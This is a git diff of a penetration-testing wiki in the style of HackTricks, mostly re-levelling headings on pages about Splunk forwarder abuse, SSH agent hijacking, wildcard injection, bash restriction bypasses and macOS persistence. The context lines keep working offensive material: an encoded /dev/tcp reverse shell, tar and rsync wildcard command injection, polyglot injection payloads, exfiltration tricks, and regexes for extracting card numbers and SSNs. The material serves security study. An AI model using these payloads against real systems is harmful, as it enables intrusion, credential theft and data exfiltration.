-#### Remediation Recommendation’s for Splunk, Inc:
+### Remediation Recommendation’s for Splunk, Inc:
I recommend implementing all of the following solutions to provide defense in depth:
@@ -141,16 +139,16 @@ I recommend implementing all of the following solutions to provide defense in de
2. Enable TLS mutual authentication between the clients and server, using individual keys for each client. This would provide very high bi-directional security between all Splunk services. TLS mutual authentication is being heavily implemented in agents and IoT devices, this is the future of trusted device client to server communication.
3. Send all code, single line or script files, in a compressed file which is encrypted and signed by the Splunk server. This does not protect the agent data sent through the API, but protects against malicious Remote Code Execution from a 3rd party.
-#### Remediation Recommendation’s for Splunk customers:
+### Remediation Recommendation’s for Splunk customers:
1. Ensure a very strong password is set for Splunk agents. I recommend at least a 15-character random password, but since these passwords are never typed this could be set to a very large password such as 50 characters.
2. Configure host based firewalls to only allow connections to port 8089/TCP (Universal Forwarder Agent’s port) from the Splunk server.
-### Recommendations for Red Team:
+## Recommendations for Red Team:
1. Download a copy of Splunk Universal Forwarder for each operating system, as it is a great light weight signed implant. Good to keep a copy incase Splunk actually fixes this.
-### Exploits/Blogs from other researchers
+## Exploits/Blogs from other researchers
Usable public exploits:
diff --git a/linux-unix/privilege-escalation/ssh-forward-agent-exploitation.md b/linux-unix/privilege-escalation/ssh-forward-agent-exploitation.md
index 625e1d9e..e7af1534 100644
--- a/linux-unix/privilege-escalation/ssh-forward-agent-exploitation.md
+++ b/linux-unix/privilege-escalation/ssh-forward-agent-exploitation.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# SSH Forward Agent exploitation
-
-## Summary
+# Summary
What can you do if you discover inside the `/etc/ssh_config` or inside `$HOME/.ssh/config` configuration this:
@@ -35,7 +33,7 @@ Impersonate Bob using one of Bob's ssh-agent:
SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh bob@boston
```
-### Why does this work?
+## Why does this work?
When you set the variable `SSH_AUTH_SOCK` you are accessing the keys of Bob that have been used in Bobs ssh connection. Then, if his private key is still there (normally it will be), you will be able to access any host using it.
@@ -43,11 +41,11 @@ As the private key is saved in the memory of the agent uncrypted, I suppose that
Another option, is that the user owner of the agent and root may be able to access the memory of the agent and extract the private key.
-## Long explanation and exploitation
+# Long explanation and exploitation
**Taken from:** [**https://www.clockwork.com/news/2012/09/28/602/ssh\_agent\_hijacking/**](https://www.clockwork.com/news/2012/09/28/602/ssh\_agent\_hijacking/)
-### **When ForwardAgent Can’t Be Trusted**
+## **When ForwardAgent Can’t Be Trusted**
SSH without passwords makes life with Unix-like operating systems much easier. If your network requires chained ssh sessions (to access a restricted network, for example), agent forwarding becomes extremely helpful. With agent forwarding it’s possible for me to connect from my laptop to my dev server and from there run an svn checkout from yet another server, all without passwords, while keeping my private key safe on my local workstation.
@@ -55,7 +53,7 @@ This can be dangerous, though. A quick web search will reveal several articles i
That’s what this article is for. But first, some background.
-### **How Passwordless Authentication Works**
+## **How Passwordless Authentication Works**
When authenticating in normal mode, SSH uses your password to prove that you are who you say you are. The server compares a hash of this password to one it has on file, verifies that the hashes match, and lets you in.
@@ -67,11 +65,11 @@ The private key is valuable and must be protected, so by default it is stored in
OpenSSH includes [ssh-agent](http://www.openbsd.org/cgi-bin/man.cgi?query=ssh-agent), a daemon that runs on your local workstation. It loads a decrypted copy of your private key into memory, so you only have to enter your passphrase once. It then provides a local [socket](http://en.wikipedia.org/wiki/Unix\_domain\_socket) that the ssh client can use to ask it to decrypt the encrypted message sent back by the remote server. Your private key stays safely ensconced in the ssh-agent process’ memory while still allowing you to ssh around without typing in passwords.
-### **How ForwardAgent Works**
+## **How ForwardAgent Works**
Many tasks require “chaining” ssh sessions. Consider my example from earlier: I ssh from my workstation to the dev server. While there, I need to perform an svn update, using the “svn+ssh” protocol. Since it would be silly to leave an unencrypted copy of my super-secret private key on a shared server, I’m now stuck with password authentication. If, however, I enabled “ForwardAgent” in the ssh config on my workstation, ssh uses its built-in tunneling capabilities to create another socket on the dev server that is tunneled back to the ssh-agent socket on my local workstation. This means that the ssh client on the dev server can now send “decrypt this secret message” requests directly back to the ssh-agent running on my workstation, authenticating itself to the svn server without ever having access to my private key.
-### **Why This Can Be Dangerous**
+## **Why This Can Be Dangerous**
Simply put, anyone with root privilege on the the intermediate server can make free use of your ssh-agent to authenticate them to other servers. A simple demonstration shows how trivially this can be done. Hostnames and usernames have been changed to protect the innocent.
@@ -158,7 +156,7 @@ bob
I have succesfully parlayed my root privileges on “seattle” to access as bob on “boston”. I’ll bet I can use that to get him fired.
-### **Protect Yourself!**
+## **Protect Yourself!**
Don’t let your ssh-agent store your keys indefinitely. On OS X, configure your Keychain to lock after inactivity or when your screen locks. On other Unix-y platforms, pass the -t option to ssh-agent so its keys will be removed after seconds.
@@ -174,7 +172,7 @@ Host *
ForwardAgent no
```
-### **Recommended Reading**
+## **Recommended Reading**
* [OpenSSH key management](http://www.ibm.com/developerworks/library/l-keyc/index.html) – Daniel Robbins
* [An Illustrated Guide to SSH Agent Forwarding](http://www.unixwiz.net/techtips/ssh-agent-forwarding.html) – Steve Friedl
diff --git a/linux-unix/privilege-escalation/wildcards-spare-tricks.md b/linux-unix/privilege-escalation/wildcards-spare-tricks.md
index ee22f776..591e6370 100644
--- a/linux-unix/privilege-escalation/wildcards-spare-tricks.md
+++ b/linux-unix/privilege-escalation/wildcards-spare-tricks.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Wildcards Spare tricks
-
-### chown, chmod
+## chown, chmod
You can **indicate which file owner and permissions you want to copy for the rest of the files**
@@ -30,7 +28,7 @@ touch "--reference=/my/own/path/filename"
You can exploit this using [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(combined attack)_\
__More info in [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930)
-### Tar
+## Tar
**Execute arbitrary commands:**
@@ -42,7 +40,7 @@ touch "--checkpoint-action=exec=sh shell.sh"
You can exploit this using [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(tar attack)_\
__More info in [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930)
-### Rsync
+## Rsync
**Execute arbitrary commands:**
@@ -60,7 +58,7 @@ touch "-e sh shell.sh"
You can exploit this using [https://github.com/localh0t/wildpwn/blob/master/wildpwn.py](https://github.com/localh0t/wildpwn/blob/master/wildpwn.py) _(_rsync _attack)_\
__More info in [https://www.exploit-db.com/papers/33930](https://www.exploit-db.com/papers/33930)
-### 7z
+## 7z
In **7z** even using `--` before `*` (note that `--` means that the following input cannot treated as parameters, so just file paths in this case) you can cause an arbitrary error to read a file, so if a command like the following one is being executed by root:
diff --git a/linux-unix/useful-linux-commands/README.md b/linux-unix/useful-linux-commands/README.md
index 08a3fb1e..37edc511 100644
--- a/linux-unix/useful-linux-commands/README.md
+++ b/linux-unix/useful-linux-commands/README.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Useful Linux Commands
-
-## Common Bash
+# Common Bash
```bash
#Exfiltration using Base64
@@ -83,7 +81,7 @@ python3 -m http.server
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"
php -S $ip:80
-##Curl
+#Curl
#json data
curl --header "Content-Type: application/json" --request POST --data '{"password":"password", "username":"admin"}' http://host:3000/endpoint
#Auth via JWT
@@ -99,10 +97,10 @@ dd if=file.bin bs=28 skip=1 of=blob
sudo apt-get install libguestfs-tools
guestmount --add NAME.vhd --inspector --ro /mnt/vhd #For read-only, create first /mnt/vhd
-## ssh-keyscan, help to find if 2 ssh ports are from the same host comparing keys
+# ssh-keyscan, help to find if 2 ssh ports are from the same host comparing keys
ssh-keyscan 10.10.10.101
-## Openssl
+# Openssl
openssl s_client -connect 10.10.10.127:443 #Get the certificate from a server
openssl x509 -in ca.cert.pem -text #Read certificate
openssl genrsa -out newuser.key 2048 #Create new RSA2048 key
@@ -110,7 +108,7 @@ openssl req -new -key newuser.key -out newuser.csr #Generate certificate from a
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Create certificate
openssl x509 -req -in newuser.csr -CA intermediate.cert.pem -CAkey intermediate.key.pem -CAcreateserial -out newuser.pem -days 1024 -sha256 #Create a signed certificate
openssl pkcs12 -export -out newuser.pfx -inkey newuser.key -in newuser.pem #Create from the signed certificate the pkcs12 certificate format (firefox)
-## If you only needs to create a client certificate from a Ca certificate and the CA key, you can do it using:
+# If you only needs to create a client certificate from a Ca certificate and the CA key, you can do it using:
openssl pkcs12 -export -in ca.cert.pem -inkey ca.key.pem -out client.p12
# Decrypt ssh key
openssl rsa -in key.ssh.enc -out key.ssh
@@ -120,7 +118,7 @@ openssl enc -aes256 -k -d -in backup.tgz.enc -out b.tgz
#Count number of instructions executed by a program, need a host based linux (not working in VM)
perf stat -x, -e instructions:u "ls"
-##Find trick for HTB, find files from 2018-12-12 to 2018-12-14
+#Find trick for HTB, find files from 2018-12-12 to 2018-12-14
find / -newermt 2018-12-12 ! -newermt 2018-12-14 -type f -readable -not -path "/proc/*" -not -path "/sys/*" -ls 2>/dev/null
#Reconfigure timezone
@@ -137,7 +135,7 @@ sudo chattr +i file.txt
sudo chattr -i file.txt #Remove the bit so you can delete it
```
-## Bash for Windows
+# Bash for Windows
```bash
#Base64 for Windows
@@ -159,7 +157,7 @@ python pyinstaller.py --onefile exploit.py
i686-mingw32msvc-gcc -o executable useradd.c
```
-## Greps
+# Greps
```bash
#Extract emails from file
@@ -174,7 +172,7 @@ grep -i "pwd\|passw" file.txt
#Extract users
grep -i "user\|invalid\|authentication\|login" file.txt
-## Extract hashes
+# Extract hashes
#Extract md5 hashes ({32}), sha1 ({40}), sha256({64}), sha512({128})
egrep -oE '(^|[^a-fA-F0-9])[a-fA-F0-9]{32}([^a-fA-F0-9]|$)' *.txt | egrep -o '[a-fA-F0-9]{32}' > md5-hashes.txt
#Extract valid MySQL-Old hashes
@@ -210,7 +208,7 @@ grep -E '(((https|ftp|gopher)|mailto)[.:][^ >" ]*|www.[-a-z0-9.]+)[^ .,; >">):]'
#Extract Floating point numbers
grep -E -o "^[-+]?[0-9]*.?[0-9]+([eE][-+]?[0-9]+)?$" *.txt > floats.txt
-## Extract credit card data
+# Extract credit card data
#Visa
grep -E -o "4[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > visa.txt
#MasterCard
@@ -226,7 +224,7 @@ grep -E -o "\b(?:2131|1800|35d{3})d{11}\b" *.txt > jcb.txt
#AMEX
grep -E -o "3[47][0-9]{2}[ -]?[0-9]{6}[ -]?[0-9]{5}" *.txt > amex.txt
-## Extract IDs
+# Extract IDs
#Extract Social Security Number (SSN)
grep -E -o "[0-9]{3}[ -]?[0-9]{2}[ -]?[0-9]{4}" *.txt > ssn.txt
#Extract Indiana Driver License Number
@@ -241,7 +239,7 @@ grep -Po 'd{3}[s-_]?d{3}[s-_]?d{4}' *.txt > us-phones.txt
egrep -a -o "\bISBN(?:-1[03])?:? (?=[0-9X]{10}$|(?=(?:[0-9]+[- ]){3})[- 0-9X]{13}$|97[89][0-9]{10}$|(?=(?:[0-9]+[- ]){4})[- 0-9]{17}$)(?:97[89][- ]?)?[0-9]{1,5}[- ]?[0-9]+[- ]?[0-9]+[- ]?[0-9X]\b" *.txt > isbn.txt
```
-## Nmap search help
+# Nmap search help
```bash
#Nmap scripts ((default or version) and smb))
@@ -250,14 +248,14 @@ locate -r '\.nse$' | xargs grep categories | grep 'default\|version\|safe' | gre
nmap --script-help "(default or version) and smb)"
```
-## Bash
+# Bash
```bash
#All bytes inside a file (except 0x20 and 0x00)
for j in $((for i in {0..9}{0..9} {0..9}{a..f} {a..f}{0..9} {a..f}{a..f}; do echo $i; done ) | sort | grep -v "20\|00"); do echo -n -e "\x$j" >> bytes; done
```
-## Iptables
+# Iptables
```bash
#Delete curent rules and chains
diff --git a/linux-unix/useful-linux-commands/bypass-bash-restrictions.md b/linux-unix/useful-linux-commands/bypass-bash-restrictions.md
index 84746f34..7a32c35c 100644
--- a/linux-unix/useful-linux-commands/bypass-bash-restrictions.md
+++ b/linux-unix/useful-linux-commands/bypass-bash-restrictions.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Bypass Bash Restrictions
-
-## Reverse Shell
+# Reverse Shell
```bash
# Double-Base64 is a great way to avoid bad characters like +, works 99% of the time
@@ -27,7 +25,7 @@ echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|
#echo\WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h
```
-### Short Rev shell
+## Short Rev shell
```bash
#Trick from Dikline
@@ -37,7 +35,7 @@ echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|
exec >&0
```
-## Bypass Paths and forbidden words
+# Bypass Paths and forbidden words
```bash
# Question mark binary substitution
@@ -81,14 +79,14 @@ whoa # This will throw an error
!-1!-2 # This will execute whoami
```
-## Bypass forbidden spaces
+# Bypass forbidden spaces
```bash
# {form}
{cat,lol.txt} # cat lol.txt
{echo,test} # echo test
-## IFS - Internal field separator, change " " for any other character ("]" in this case)
+# IFS - Internal field separator, change " " for any other character ("]" in this case)
cat${IFS}/etc/passwd # cat /etc/passwd
cat$IFS/etc/passwd # cat /etc/passwd
@@ -108,19 +106,19 @@ i\
n\
g # These 4 lines will equal to ping
-## Undefined variables and !
+# Undefined variables and !
$u $u # This will be saved in the history and can be used as a space, please notice that the $u variable is undefined
uname!-1\-a # This equals to uname -a
```
-## Bypass backslash and slash
+# Bypass backslash and slash
```bash
cat ${HOME:0:1}etc${HOME:0:1}passwd
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
```
-## Bypass with hex encoding
+# Bypass with hex encoding
```bash
echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
@@ -132,31 +130,31 @@ xxd -r -ps <(echo 2f6574632f706173737764)
cat `xxd -r -ps <(echo 2f6574632f706173737764)`
```
-## Bypass IPs
+# Bypass IPs
```bash
# Decimal IPs
127.0.0.1 == 2130706433
```
-## Time based data exfiltration
+# Time based data exfiltration
```bash
time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
```
-## DNS data exfiltration
+# DNS data exfiltration
You could use **burpcollab** or [**pingb**](http://pingb.in) for example.
-## Polyglot command injection
+# Polyglot command injection
```bash
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
```
-## References & More
+# References & More
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits" %}
diff --git a/macos/macos-security-and-privilege-escalation/README.md b/macos/macos-security-and-privilege-escalation/README.md
index c4653b06..3bec12d0 100644
--- a/macos/macos-security-and-privilege-escalation/README.md
+++ b/macos/macos-security-and-privilege-escalation/README.md
@@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# MacOS Security & Privilege Escalation
-
{% hint style="warning" %}
**Support HackTricks and get benefits!**
@@ -40,9 +38,9 @@ First of all, please note that **most of the tricks about privilege escalation a
[privilege-escalation](../../linux-unix/privilege-escalation/)
{% endcontent-ref %}
-## Basic MacOS
+# Basic MacOS
-### OS X Specific Extensions
+## OS X Specific Extensions
* **`.dmg`**: Apple Disk Image files are very frequent for installers.
* **`.kext`**: It must follow a specific structure and it's the OS X version of a driver.
@@ -55,7 +53,7 @@ First of all, please note that **most of the tricks about privilege escalation a
* **`.dylib`**: Dynamic libraries (like Windows DLL files)
* **`.pkg`**: Are the same as xar (eXtensible Archive format). The installer command can be use to install the contents of these files.
-### File hierarchy layout
+## File hierarchy layout
* **/Applications**: The installed apps should be here. All the users will be able to access them.
* **/bin**: Command line binaries
@@ -73,7 +71,7 @@ First of all, please note that **most of the tricks about privilege escalation a
* **/Volumes**: The mounted drives will apear here.
* **/.vol**: Running `stat a.txt` you obtain something like `16777223 7545753 -rw-r--r-- 1 username wheel ...` where the first number is the id number of the volume where the file exists and the second one is the inode number. You can access the content of this file through /.vol/ with that information running `cat /.vol/16777223/7545753`
-### Special MacOS files and folders
+## Special MacOS files and folders
* **`.DS_Store`**: This file is on each directory, it saves the attributes and customisations of the directory.
* **`.Spotlight-V100`**: This folder appears on the root directory of every volume on the system.
@@ -89,7 +87,7 @@ First of all, please note that **most of the tricks about privilege escalation a
* **`/private/var/db/launchd.db/com.apple.launchd/overrides.plist`**: List of daemons deactivated.
* **`/private/etc/kcpassword`**: If autologin is enabled this file will contain the users login password XORed with a key.
-### Common users
+## Common users
* **Daemon**: User reserved for system daemons. The default daemon account names usually start with a "\_":
@@ -101,14 +99,14 @@ First of all, please note that **most of the tricks about privilege escalation a
* **Nobody**: Processes are executed with this user when minimal permissions are required
* **Root**
-### User Privileges
+## User Privileges
* **Standard User:** The most basic of users. This user needs permissions granted from an admin user when attempting to install software or perform other advanced tasks. They are not able to do it on their own.
* **Admin User**: A user who operates most of the time as a standard user but is also allowed to perform root actions such as install software and other administrative tasks. All users belonging to the admin group are **given access to root via the sudoers file**.
* **Root**: Root is a user allowed to perform almost any action (there are limitations imposed by protections like System Integrity Protection).
* For example root won't be able to place a file inside `/System`
-### **File ACLs**
+## **File ACLs**
When the file contains ACLs you will **find a "+" when listing the permissions like in**:
@@ -131,7 +129,7 @@ You can find **all the files with ACLs** with (this is veeery slow):
ls -RAle / 2>/dev/null | grep -E -B1 "\d: "
```
-### Resource Forks or MacOS ADS
+## Resource Forks or MacOS ADS
This is a way to obtain **Alternate Data Streams in MacOS** machines. You can save content inside an extended attribute called **com.apple.ResourceFork** inside a file by saving it in **file/..namedfork/rsrc**.
@@ -152,7 +150,7 @@ You can **find all the files containing this extended attribute** with:
find / -type f -exec ls -ld {} \; 2>/dev/null | grep -E "[x\-]@ " | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.ResourceFork"
```
-### Risk Files Mac OS
+## Risk Files Mac OS
The files `/System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/System` contains the risk associated to files depending on the file extension.
@@ -163,7 +161,7 @@ The possible categories include the following:
* **LSRiskCategoryUnsafeExecutable**: **Triggers** a **warning** “This file is an application...”
* **LSRiskCategoryMayContainUnsafeExecutable**: This is for things like archives that contain an executable. It **triggers a warning unless Safari can determine all the contents are safe or neutral**.
-### Remote Access Services
+## Remote Access Services
You can enable/disable these services in "System Preferences" --> Sharing
@@ -184,51 +182,51 @@ bmM=$(netstat -na | grep LISTEN | egrep 'tcp4|tcp6' | grep "*.4488" | wc -l);
printf "\nThe following services are OFF if '0', or ON otherwise:\nScreen Sharing: %s\nFile Sharing: %s\nRemote Login: %s\nRemote Mgmt: %s\nRemote Apple Events: %s\nBack to My Mac: %s\n\n" "$scrShrng" "$flShrng" "$rLgn" "$rmMgmt" "$rAE" "$bmM";
```
-### MacOS Architecture
+## MacOS Architecture
{% content-ref url="mac-os-architecture.md" %}
[mac-os-architecture.md](mac-os-architecture.md)
{% endcontent-ref %}
-### MacOS Serial Number
+## MacOS Serial Number
{% content-ref url="macos-serial-number.md" %}
[macos-serial-number.md](macos-serial-number.md)
{% endcontent-ref %}
-### MacOS MDM
+## MacOS MDM
{% content-ref url="macos-mdm/" %}
[macos-mdm](macos-mdm/)
{% endcontent-ref %}
-### MacOS Protocols
+## MacOS Protocols
{% content-ref url="macos-protocols.md" %}
[macos-protocols.md](macos-protocols.md)
{% endcontent-ref %}
-### MacOS - Inspecting, Debugging and Fuzzing
+## MacOS - Inspecting, Debugging and Fuzzing
{% content-ref url="macos-apps-inspecting-debugging-and-fuzzing.md" %}
[macos-apps-inspecting-debugging-and-fuzzing.md](macos-apps-inspecting-debugging-and-fuzzing.md)
{% endcontent-ref %}
-## MacOS Security Mechanisms
+# MacOS Security Mechanisms
-### Gatekeeper
+## Gatekeeper
[**In this talk**](https://www.youtube.com/watch?v=T5xfL9tEg44) Jeremy Brown talks about this protections and a bug that allowed to bypass them.
_**Gatekeeper**_ is designed to ensure that, by default, **only trusted software runs on a user’s Mac**. Gatekeeper is used when a user **downloads** and **opens** an app, a plug-in or an installer package from outside the App Store. Gatekeeper verifies that the software is **signed by** an **identified developer**, is **notarised** by Apple to be **free of known malicious content**, and **hasn’t been altered**. Gatekeeper also **requests user approval** before opening downloaded software for the first time to make sure the user hasn’t been tricked into running executable code they believed to simply be a data file.
-### Notarizing
+## Notarizing
In order for an **app to be notarised by Apple**, the developer needs to send the app for review. Notarization is **not App Review**. The Apple notary service is an **automated system** that **scans your software for malicious content**, checks for code-signing issues, and returns the results to you quickly. If there are no issues, the notary service generates a ticket for you to staple to your software; the notary service also **publishes that ticket online where Gatekeeper can find it**.
When the user first installs or runs your software, the presence of a ticket (either online or attached to the executable) **tells Gatekeeper that Apple notarized the software**. **Gatekeeper then places descriptive information in the initial launch dialog** indicating that Apple has already checked for malicious content.
-### File Quarantine
+## File Quarantine
Gatekeeper builds upon **File Quarantine.**\
Upon download of an application, a particular **extended file attribute** ("quarantine flag") can be **added** to the **downloaded** **file**. This attribute **is added by the application that downloads the file**, such as a **web** **browser** or email client, but is not usually added by others like common BitTorrent client software.\
@@ -289,7 +287,7 @@ And find all the quarantined files with:
find / -exec ls -ld {} \; 2>/dev/null | grep -E "[x\-]@ " | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.quarantine"
```
-### XProtect
+## XProtect
**X-Protect** is also part of Gatekeeper. **It's Apple’s built in malware scanner.** It keeps track of known malware hashes and patterns.\
You can get information about the latest XProtect update running:
@@ -298,15 +296,15 @@ You can get information about the latest XProtect update running:
system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5
```
-### MRT: Malware Removal Tool
+## MRT: Malware Removal Tool
Should malware make its way onto a Mac, macOS also includes technology to remediate infections. The _Malware Removal Tool (MRT)_ is an engine in macOS that remediates infections based on updates automatically delivered from Apple (as part of automatic updates of system data files and security updates). **MRT removes malware upon receiving updated information** and it continues to check for infections on restart and login. MRT doesn’t automatically reboot the Mac. (From [here](https://support.apple.com/en-gb/guide/security/sec469d47bd8/web#:\~:text=The%20Malware%20Removal%20Tool%20\(MRT,data%20files%20and%20security%20updates\).))
-### Automatic Security Updates
+## Automatic Security Updates
Apple issues the **updates for XProtect and MRT automatically** based on the latest threat intelligence available. By default, macOS checks for these updates **daily**. Notarisation updates are distributed using CloudKit sync and are much more frequent.
-### TCC
+## TCC
**TCC (Transparency, Consent, and Control)** is a mechanism in macOS to **limit and control application access to certain features**, usually from a privacy perspective. This can include things such as location services, contacts, photos, microphone, camera, accessibility, full disk access, and a bunch more.
@@ -334,7 +332,7 @@ Unprotected directories:
* $HOME/.ssh, $HOME/.aws, etc
* /tmp
-#### Bypasses
+### Bypasses
By default an access via **SSH** will have **"Full Disk Access"**. In order to disable this you need to have it listed but disabled (removing it from the list won't remove those privileges):
@@ -344,7 +342,7 @@ Here you can find examples of how some **malwares have been able to bypass this
* [https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/](https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/)
-### Seatbelt Sandbox
+## Seatbelt Sandbox
MacOS Sandbox works with the kernel extension Seatbelt. It makes applications run inside the sandbox **need to request access to resources outside of the limited sandbox**. This helps to ensure that **the application will be accessing only expected resources** and if it wants to access anything else it will need to ask for permissions to the user.
@@ -365,7 +363,7 @@ Bypasses examples:
* [https://lapcatsoftware.com/articles/sandbox-escape.html](https://lapcatsoftware.com/articles/sandbox-escape.html)
* [https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c](https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c) (they are able to write files outside the sandbox whose name starts with `~$`).
-### SIP - System Integrity Protection
+## SIP - System Integrity Protection
This protection was enabled to **help keep root level malware from taking over certain parts** of the operating system. Although this means **applying limitations to the root user** many find it to be worthwhile trade off.\
The most notable of these limitations are that **users can no longer create, modify, or delete files inside** of the following four directories in general:
@@ -421,7 +419,7 @@ For more **information about SIP** read the following response: [https://apple.s
This post about a **SIP bypass vulnerability** is also very interesting: [https://www.microsoft.com/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/](https://www.microsoft.com/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/)
-### Apple Binary Signatures
+## Apple Binary Signatures
When checking some **malware sample** you should always **check the signature** of the binary as the **developer** that signed it may be already **related** with **malware.**
@@ -436,7 +434,7 @@ codesign --verify --verbose /Applications/Safari.app
spctl --assess --verbose /Applications/Safari.app
```
-## Installed Software & Services
+# Installed Software & Services
Check for **suspicious** applications installed and **privileges** over the.installed resources:
@@ -447,7 +445,7 @@ lsappinfo list #Installed Apps
launchtl list #Services
```
-## User Processes
+# User Processes
```bash
# will print all the running services under that particular user domain.
@@ -460,11 +458,11 @@ launchctl print system
launchctl print gui//com.company.launchagent.label
```
-## Auto Start Extensibility Point (ASEP)
+# Auto Start Extensibility Point (ASEP)
An **ASEP** is a location on the system that could lead to the **execution** of a binary **without** **user** **interaction**. The main ones used in OS X take the form of plists.
-### Launchd
+## Launchd
**`launchd`** is the **first** **process** executed by OX S kernel at startup and the last one to finish at shut down. It should always have the **PID 1**. This process will **read and execute** the configurations indicated in the **ASEP** **plists** in:
@@ -515,7 +513,7 @@ List all the agents and daemons loaded by the current user:
launchctl list
```
-### Cron
+## Cron
List the cron jobs of the **current user** with:
@@ -533,7 +531,7 @@ ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /etc/periodic/
There you can find the regular **cron** **jobs**, the **at** **jobs** (not very used) and the **periodic** **jobs** (mainly used for cleaning temporary files). The daily periodic jobs can be executed for example with: `periodic daily`.
-### kext
+## kext
In order to install a KEXT as a startup item, it needs to be **installed in one of the following locations**:
@@ -554,7 +552,7 @@ kextunload -b com.apple.driver.ExampleBundle
For more information about [**kernel extensions check this section**](mac-os-architecture.md#i-o-kit-drivers).
-### **Login Items**
+## **Login Items**
In System Preferences -> Users & Groups -> **Login Items** you can find **items to be executed when the user logs in**.\
It it's possible to list them, add and remove from the command line:
@@ -572,7 +570,7 @@ osascript -e 'tell application "System Events" to delete login item "itemname"'
These items are stored in the file /Users/\/Library/Application Support/com.apple.backgroundtaskmanagementagent
-### At
+## At
“At tasks” are used to **schedule tasks at specific times**.\
These tasks differ from cron in that **they are one time tasks** t**hat get removed after executing**. However, they will **survive a system restart** so they can’t be ruled out as a potential threat.
@@ -591,7 +589,7 @@ echo hello > /tmp/hello | at 1337
If AT tasks aren't enabled the created tasks won't be executed.
-### Login/Logout Hooks
+## Login/Logout Hooks
They are deprecated but can be used to execute commands when a user logs in.
@@ -627,7 +625,7 @@ In the previous example we have created and deleted a **LoginHook**, it's also p
The root user one is stored in `/private/var/root/Library/Preferences/com.apple.loginwindow.plist`
-### Emond
+## Emond
Apple introduced a logging mechanism called **emond**. It appears it was never fully developed, and development may have been **abandoned** by Apple for other mechanisms, but it remains **available**.
@@ -641,7 +639,7 @@ ls -l /private/var/db/emondClients
**As this isn't used much, anything in that folder should be suspicious**
{% endhint %}
-### Startup Items
+## Startup Items
{% hint style="danger" %}
**This is deprecated, so nothing should be found in the following directories.**
@@ -691,7 +689,7 @@ RunService "$1"
```
{% endcode %}
-### /etc/rc.common
+## /etc/rc.common
{% hint style="danger" %}
**This isn't working in modern MacOS versions**
@@ -700,42 +698,42 @@ RunService "$1"
It's also possible to place here **commands that will be executed at startup.** Example os regular rc.common script:
```bash
-##
+#
# Common setup for startup scripts.
-##
+#
# Copyright 1998-2002 Apple Computer, Inc.
-##
+#
-#######################
+######################
# Configure the shell #
-#######################
+######################
-##
+#
# Be strict
-##
+#
#set -e
set -u
-##
+#
# Set command search path
-##
+#
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/libexec:/System/Library/CoreServices; export PATH
-##
+#
# Set the terminal mode
-##
+#
#if [ -x /usr/bin/tset ] && [ -f /usr/share/misc/termcap ]; then
# TERM=$(tset - -Q); export TERM
#fi
-####################
+###################
# Useful functions #
-####################
+###################
-##
+#
# Determine if the network is up by looking for any non-loopback
# internet network interfaces.
-##
+#
CheckForNetwork()
{
local test
@@ -752,9 +750,9 @@ CheckForNetwork()
alias ConsoleMessage=echo
-##
+#
# Process management
-##
+#
GetPID ()
{
local program="$1"
@@ -778,9 +776,9 @@ GetPID ()
fi
}
-##
+#
# Generic action handler
-##
+#
RunService ()
{
case $1 in
@@ -792,7 +790,7 @@ RunService ()
}
```
-### Profiles
+## Profiles
Configuration profiles can force a user to use certain browser settings, DNS proxy settings, or VPN settings. Many other payloads are possible which make them ripe for abuse.
@@ -802,14 +800,14 @@ You can enumerate them running:
ls -Rl /Library/Managed\ Preferences/
```
-### Other persistence techniques and tools
+## Other persistence techniques and tools
* [https://github.com/cedowens/Persistent-Swift](https://github.com/cedowens/Persistent-Swift)
* [https://github.com/D00MFist/PersistentJXA](https://github.com/D00MFist/PersistentJXA)
-## Memory Artifacts
